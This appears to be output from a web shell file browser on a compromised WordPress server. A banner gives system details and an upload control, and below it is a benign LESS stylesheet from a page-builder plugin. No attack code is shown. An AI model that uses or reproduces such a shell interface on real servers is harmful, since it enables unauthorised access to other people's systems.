HEX
Server: nginx/1.24.0
System: Linux webserver 6.8.0-87-generic #88-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct 11 09:28:41 UTC 2025 x86_64
User: wpuser (1002)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: //proc/self/cwd/wp-content/plugins/js_composer_salient/assets/less/shortcodes/vc_responsive.less
@stop_standalone_compiling: @vc_grey;
/* Responsive stuff
---------------------------------------------------------- */
/* Make all grid-sized elements block level again */
@media (max-width: @vc_responsive_max_w) {
  .vc_responsive {
    div.vc_row-fluid div[class*="vc_col-"] {
      float: none;
      display: block;
      width: auto;
      margin-left: 0;
    }
  }
}